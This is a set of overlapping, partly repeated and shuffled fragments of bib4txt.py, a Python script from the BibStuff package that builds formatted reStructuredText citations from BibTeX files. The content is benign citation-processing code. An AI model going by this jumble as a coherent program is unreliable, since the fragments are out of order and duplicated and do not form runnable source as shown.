"the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/",
"= cite_processor.all_citekeys #make the citation definitions for a list of References bib4txt_logger.info('make citations')",
"for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif",
"-o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\",",
"stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int, dest=\"verbosity\", default=0, help=\"2: print DEBUG messages; 1:",
"parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\"",
"holds the bibliography, so we can make a sorted entry list. To do",
"parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for",
"_infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding",
"used in the References section of your documents. :author: <NAME> :date: 2006-07-27 :contact:",
"root='src') # create object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready",
"bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default: stdout) if",
"bibgrammar.py.) - Extracts the citation references from the input document. - Outputs a",
"style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation manager citekeys",
"EBNF_ grammar into an object for scanning reST files for citation references. -",
"are set when this file is run as a script # style #",
"references for a text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style",
"help. \"\"\" #set default input and output _infile = sys.stdin _outfile = sys.stdout",
"on `stylefile` command-line option #TODO: add error handling for unknown styles style =",
"_msg = \"\"\"ABORTED because output file %s already exists: Use -n option to",
"%s already exists: Use -n option to nuke (overwrite) this file. PLEASE CHECK",
"allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python",
"BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse",
"`license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt supercedes addrefs.py, by",
"\"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS",
"this in your reST document with an ``include`` directive. How it works: -",
"in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create",
"citation manager citekeys to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys",
"file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s",
"entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use",
"\"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*',",
"bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to run without",
"formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile,",
"of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if",
"citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager = style.CitationManager([parsed_bibfile], citekeys=None,",
"citation_manager.make_citations() #lastly, prepend the entire document, if desired if not citations_only: result =",
"file is run as a script # style # bibfile_processor # note that",
"citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser,",
"document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file (without using",
"addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies:",
"# some globals are set when this file is run as a script",
"bib4txt.py -h for help. \"\"\" #set default input and output _infile = sys.stdin",
"during src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite processor')",
"= os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles,",
"ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in",
"citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\")",
"help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\")",
"citation definitions, to be used in the References section of your documents. :author:",
"'2.7+' ################### IMPORTS ################################################## #import from standard library import importlib, os, sys import",
"stylename = os.path.splitext(stylename)[0] bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\",",
"make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if",
"list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear",
"documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm :copyright: 2006 by <NAME> :license: MIT",
"NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database (.bib) files",
"formatted references for a text document. Uuseful for reStructuredText documents. Interacts with a",
"################### GLOBALS ################################################## # some globals are set when this file is run",
"available!) - BibStuff (which you should have if you have this) The source",
"parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile !=",
"simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create",
"to base the sorting :note: Sorting is style dependent---e.g., might sort entries on",
"modification of the reStructuredText ``cite`` directive is currently allowed: - Most characters are",
"default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\",",
"directive is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now",
"bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile != \"default.py\": bib4txt_logger.info(\"It is currently recommended to",
"to allow user to run without installing scriptdir = os.path.dirname(os.path.realpath(__file__)) bibdir = os.path.dirname(scriptdir)",
"files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG)",
"not appear to be a .bib file.\"%bibfile_name ) try: with open(bibfile_name,'r') as fh:",
"def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations",
"newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if",
"bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ =",
"#Python 2 did not accept encoding arg _infile = open(args.infile, mode='r') except: raise",
"action=\"store_true\", dest=\"verbose\", default=False, help=\"Print INFO messages to stdout, default=%(default)s\") parser.add_argument(\"-V\", \"--verbosity\", action=\"store\", type=int,",
"styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext",
"for help. \"\"\" #set default input and output _infile = sys.stdin _outfile =",
"case, the reference list is added to the end of the file. A",
"database (.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies:",
"(.bib) files :note: bib4txt supercedes addrefs.py, by <NAME> :note: Python 2.4 dependencies: sets,",
"if you have this) The source text file should include citation references in",
"help=\"The .bib files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif",
"sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ##################################################",
"styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as style\"%stylename workaround =",
"as a script # style # bibfile_processor # note that the standard separator",
"found.\") sys.exit(1) # read input file (default: stdin) if args.infile: try: _infile =",
"default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\",",
"# bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful for reStructuredText",
"dependencies: with :TODO: address the TODOs in the associate BibStuff files, especially in",
"# ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name",
"parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\")",
"help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False,",
"################################################## #import from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger",
"- Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning",
"style.CitationManager([parsed_bibfile], citekeys=None, citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src parsing",
"bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See",
"default=%(default)s\") parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions,",
"stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2",
"to convert an EBNF_ grammar into an object for scanning reST files for",
"with a Bibtex-style database file (without using LaTeX or bibtex). Dependencies: - Python",
"object to process cites during src parsing # (and associate it with the",
"sorted entry list. To do so need: - the keys for the citations",
"not bibfile_as_string: bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default: stdin)",
"stylename = os.path.splitext(args.stylefile)[0] else: stylename = args.style if \".\" in stylename: bib4txt_logger.warn(\"use the",
"type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib",
"file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') #",
"To do so need: - the keys for the citations referenced - a",
"bib4txt_logger.warning(\"No BibTeX databases found.\") sys.exit(1) # read input file (default: stdin) if args.infile:",
"set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module citations_only=True):",
"the bibliography, so we can make a sorted entry list. To do so",
"_infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec =",
"legal in reST and will be recognized by bib4txt. - Comma separted multiple",
"_infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__",
"Python 2 exec vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style']",
"################### IMPORTS ################################################## #import from standard library import importlib, os, sys import logging",
":TODO: address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py ..",
"a separate file. You can then include this in your reST document with",
"cannot be all digits. The source document can be output with formatted citation",
"standard separator for multiple keys in one citation reference is a comma #",
"sort-key on which to base the sorting :note: Sorting is style dependent---e.g., might",
"return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list()",
"an ``include`` directive. How it works: - Uses SimpleParse_ to convert an EBNF_",
"comma # CITATION_SEP = ',' # set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile,",
"keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a",
"document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer",
"citation_template=style.CITATION_TEMPLATE) #second: create CiteRefProcessor object to process cites during src parsing # (and",
"\"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\", dest=\"outfile\",",
"Bibstuff's bibgrammar.py.) - Extracts the citation references from the input document. - Outputs",
"a Bibtex-style database file (without using LaTeX or bibtex). Dependencies: - Python 2.4",
"# imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first: create",
"by <NAME> :note: Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with",
"of the file. A slight modification of the reStructuredText ``cite`` directive is currently",
"style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close() _infile.close() if __name__ == '__main__': main()",
"nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile",
"Create a simpleparse.parser Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src')",
"manager citekeys to all found keys (an ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make",
"in one citation reference is a comma # CITATION_SEP = ',' # set",
"http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\" __docformat__ = \"restructuredtext en\" __version__ = \"1.1.4\" __needs__",
"can then include this in your reST document with an ``include`` directive. How",
"with an ``include`` directive. How it works: - Uses SimpleParse_ to convert an",
"reST. The intent is for the formatted references to be written to a",
"for the formatted references to be written to a separate file. You can",
"on citation_rank. \"\"\" #set the citation manager citekeys to all found keys (an",
"tool. See bib4txt.py -h for help. \"\"\" #set default input and output _infile",
"with :TODO: address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py",
"sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard",
"now (2008) legal in reST and will be recognized by bib4txt. - Comma",
"bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp except ImportError: #hack to allow user to",
"-n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\",",
"encoding arg _infile = open(args.infile, mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc:",
"then include this in your reST document with an ``include`` directive. How it",
"\"\"\" #set the citation manager citekeys to all found keys (an ordered list)",
"\"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\",",
"Citation keys cannot be all digits. The source document can be output with",
"MIT (see `license.txt`_) :note: now allows multiple database (.bib) files :note: bib4txt supercedes",
"Python 2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address the",
"file should include citation references in reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key",
"in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse:",
"list of References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document,",
"for multiple keys in one citation reference is a comma # CITATION_SEP =",
"#lastly, prepend the entire document, if desired if not citations_only: result = cite_processor.__repr__()",
"exec vs Python 3 exec exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s",
"address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py .. _EBNF:",
"\"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default input and output",
"the file. A slight modification of the reStructuredText ``cite`` directive is currently allowed:",
"the input document. - Outputs a sorted list of citation definitions, to be",
"in the References section of your documents. :author: <NAME> :date: 2006-07-27 :contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm",
"- SimpleParse (binaries available!) - BibStuff (which you should have if you have",
"result = make_text_output( _infile.read(), cite_parser, bibfile_processor, style, citations_only = not args.entire_doc) _outfile.write(result) _outfile.close()",
"default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\",",
"= \"restructuredtext en\" __version__ = \"1.1.4\" __needs__ = '2.7+' ################### IMPORTS ################################################## #import",
"reST files for citation references. - Uses SimpleParse_ to convert an EBNF_ grammar",
"the standard separator for multiple keys in one citation reference is a comma",
"Creates formatted references for a text document. Uuseful for reStructuredText documents. Interacts with",
"database file (without using LaTeX or bibtex). Dependencies: - Python 2.4 or higher",
"citation keys. In this case, the reference list is added to the end",
"sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports",
"\"--xp\", action=\"store_true\", dest=\"xp_parse\", default=False, help=\"Use experimental document parser, default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int,",
"open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not found.\"%bibfile_name ) return",
"from standard library import importlib, os, sys import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger')",
"parser.add_argument('--version', action='version', version=__version__) parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\")",
"args.style if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a style",
"BibStuff (which you should have if you have this) The source text file",
"for scanning reST files for citation references. - Uses SimpleParse_ to convert an",
"#first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation manager') citation_manager",
"Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation",
"style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for",
"as style\"%stylename workaround = {} #work around Python 2 exec vs Python 3",
"ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser based on the chosen grammar",
"2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings = list() for bibfile_name in bibfile_names: if (os.path.splitext(bibfile_name)[-1]).lower()",
"sys.stdin _outfile = sys.stdout from argparse import ArgumentParser _usage = \"\"\" usage: %(prog)s",
"ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create a simpleparse.parser Parser",
"document can be output with formatted citation references substituted for the citation keys.",
"reStructuredText ``cite`` directive is currently allowed: - Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_``",
"2.4 dependencies: sets, sorted :note: Python 2.6 dependencies: with :TODO: address the TODOs",
"or higher - SimpleParse (binaries available!) - BibStuff (which you should have if",
"especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`: ../license.txt \"\"\"",
"(os.path.splitext(bibfile_name)[-1]).lower() != \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name )",
"with citation_manager which holds the bibliography, so we can make a sorted entry",
"action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\", \"--stylefile\", action=\"store\", dest=\"stylefile\", default=\"default.py\", help=\"Specify",
"integer value.\") parser.add_argument(\"bibfiles\", action=\"store\", nargs='*', help=\"The .bib files for the references.\") args =",
"for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the citation references from",
"underscore. Citation keys cannot be all digits. The source document can be output",
"bibdir = os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################",
"args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if",
"# read database (.bib) files bibfile_names = args.bibfiles bibfile_as_string = bibfiles2string(bibfile_names) if not",
"Parser based on the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object",
"file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files",
"dependent---e.g., might sort entries on citation_rank. \"\"\" #set the citation manager citekeys to",
"style, # imported style module citations_only=True): \"\"\"Create intext citations and the bibliography\"\"\" #first:",
"for the citation keys. In this case, the reference list is added to",
"handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\" str2exec = \"import bibstuff.bibstyles.%s as",
":note: Python 2.6 dependencies: with :TODO: address the TODOs in the associate BibStuff",
"cites during src parsing # (and associate it with the citation_manager) bib4txt_logger.debug('create cite",
".bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string, bibfile_processor) bib4txt_logger.info('bib file parsed.') result = make_text_output(",
"one citation reference is a comma # CITATION_SEP = ',' # set in",
"it with the citation_manager) bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the",
"References bib4txt_logger.info('make citations') result = citation_manager.make_citations() #lastly, prepend the entire document, if desired",
"exists: Use -n option to nuke (overwrite) this file. PLEASE CHECK FILE NAME",
"= open(args.infile, mode='r', encoding='utf-8') except TypeError: #Python 2 did not accept encoding arg",
"parser.add_argument(\"-a\", \"--all\", action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\")",
") try: with open(bibfile_name,'r') as fh: bibfiles_as_strings.append( fh.read() ) except IOError: bib4txt_logger.warning(\"%s not",
"bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in the bibfile_processor bibgrammar.Parse(bibfile_as_string,",
"CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1) _outfile = open(args.outfile,'w') # read database",
"run as a script # style # bibfile_processor # note that the standard",
"usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE",
"keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys.",
"to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY! \"\"\"%(args.outfile) print(_msg) sys.exit(1)",
"characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will",
"!= \".bib\": bib4txt_logger.warning(\"%s does not appear to be a .bib file.\"%bibfile_name ) try:",
".bib files for the references.\") args = parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity:",
"Most characters are permitted. E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and",
"for a text document. Uuseful for reStructuredText documents. Interacts with a Bibtex-style database",
"Uuseful for reStructuredText documents. Interacts with a Bibtex-style database file (without using LaTeX",
"sorting :note: Sorting is style dependent---e.g., might sort entries on citation_rank. \"\"\" #set",
"dest=\"style\", default=\"default\", help=\"Specify user-chosen style (by style name).\") #parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False,",
"action=\"store_true\", dest=\"entire_doc\", default=False, help=\"Output entire document, making citation reference substitutions, default=%(default)s\") parser.add_argument(\"-x\", \"--xp\",",
"default=%(default)s\") parser.add_argument(\"-L\", \"--logger-level\", action=\"store\", type=int, dest=\"logger_level\", help=\"Set logging level to integer value.\") parser.add_argument(\"bibfiles\",",
"bib4txt_logger.info( \"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles,",
"container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string, processor=cite_processor) \"\"\" :note: Now",
"reStructuredText documents. Interacts with a Bibtex-style database file (without using LaTeX or bibtex).",
"(which you should have if you have this) The source text file should",
"reStructuredText format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by an",
"citation_rank. \"\"\" #set the citation manager citekeys to all found keys (an ordered",
"return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for help.",
"ArgumentParser _usage = \"\"\" usage: %(prog)s [options] BIB_DATABASE standard usage: %(prog)s -i reST_FILE",
"so we can make a sorted entry list. To do so need: -",
"command-line option #TODO: add error handling for unknown styles style = importlib.import_module('bibstuff.bibstyles.%s'%stylename) \"\"\"",
"the chosen grammar cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src') # create object to store parsed",
"################################################################################ ################### GLOBALS ################################################## # some globals are set when this file is",
"\"\"\" #set default input and output _infile = sys.stdin _outfile = sys.stdout from",
"mode='r') except: raise ValueError(\"Cannot open: \"+args.infile) if args.entire_doc: ebnf_dec = ebnf_sp.cites_rest else: ebnf_dec",
"reference list is added to the end of the file. A slight modification",
"list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list of References",
"bib4txt.py \"\"\" Creates formatted references for a text document. Uuseful for reStructuredText documents.",
"citation references from the input document. - Outputs a sorted list of citation",
"bib4txt_logger.debug('create cite processor') cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager) #third: parse the text (ignore `taglist`; it",
"BibStuff files, especially in bibstyles/shared.py .. _EBNF: http://www.garshol.priv.no/download/text/bnf.html .. _SimpleParse: http://simpleparse.sourceforge.net/ .. _`license.txt`:",
"import logging logging.basicConfig(format='\\n%(levelname)s:\\n%(message)s\\n') bib4txt_logger = logging.getLogger('bibstuff_logger') #import dependencies import simpleparse #local imports try:",
"store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store",
"Bibtex-style database file (without using LaTeX or bibtex). Dependencies: - Python 2.4 or",
"format: http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations Roughly: a citation key enclosed in brackets, followed by an underscore.",
"in your reST document with an ``include`` directive. How it works: - Uses",
"it is a dummy container) bib4txt_logger.info('fill cite processor with keys') taglist = src_parser.parse(src_as_string,",
"dest=\"outfile\", help=\"Write formatted references to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently",
") return '\\n'.join( bibfiles_as_strings ) def main(): \"\"\"Command-line tool. See bib4txt.py -h for",
"Roughly: a citation key enclosed in brackets, followed by an underscore. Citation keys",
"src_parser, parsed_bibfile, style, # imported style module citations_only=True): \"\"\"Create intext citations and the",
"<filename>scripts/bib4txt.py #!/usr/bin/env python # bib4txt.py \"\"\" Creates formatted references for a text document.",
"It is also associated with citation_manager which holds the bibliography, so we can",
"= os.path.dirname(scriptdir) sys.path.insert(0, bibdir) from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ###################",
"Use -n option to nuke (overwrite) this file. PLEASE CHECK FILE NAME CAREFULLY!",
"(See Bibstuff's bibgrammar.py.) - Extracts the citation references from the input document. -",
") def main(): \"\"\"Command-line tool. See bib4txt.py -h for help. \"\"\" #set default",
"input file (default: stdin) if args.infile: try: _infile = open(args.infile, mode='r', encoding='utf-8') except",
"bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse bib file.') #store parsed .bib files in",
"# set in styles/shared.py def make_text_output(src_as_string, src_parser, parsed_bibfile, style, # imported style module",
"into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.) - Extracts the",
"script # style # bibfile_processor # note that the standard separator for multiple",
"= parser.parse_args() if args.logger_level: bib4txt_logger.setLevel(args.logger_level) elif 2==args.verbosity: bib4txt_logger.setLevel(logging.DEBUG) elif 1==args.verbosity: bib4txt_logger.setLevel(logging.INFO) if args.stylefile",
"bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp ################################################################################ ################### GLOBALS ################################################## # some globals",
"\"\\n\".join([ \"Script running:\", \" bibfiles=%s\", \" infile=%s\", \" outfile=%s\", \" style=%s\" ])%(args.bibfiles, args.infile,",
"%(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE \"\"\" parser = ArgumentParser(usage=_usage) parser.add_argument('--version', action='version',",
"to FILE\", metavar=\"FILE\") parser.add_argument(\"-n\", \"--nuke\", action=\"store_true\", dest=\"overwrite\", default=False, help=\"silently overwrite outfile, default=%(default)s\") parser.add_argument(\"-F\",",
"= \"import bibstuff.bibstyles.%s as style\"%stylename workaround = {} #work around Python 2 exec",
"if \".\" in stylename: bib4txt_logger.warn(\"use the -f option to pass a style by",
"parser.add_argument(\"-i\", \"--infile\", action=\"store\", dest=\"infile\", help=\"Parse FILE for citation references.\", metavar=\"FILE\") parser.add_argument(\"-o\", \"--outfile\", action=\"store\",",
"processor=cite_processor) \"\"\" :note: Now cite_processor.all_citekeys holds the cite keys. It is also associated",
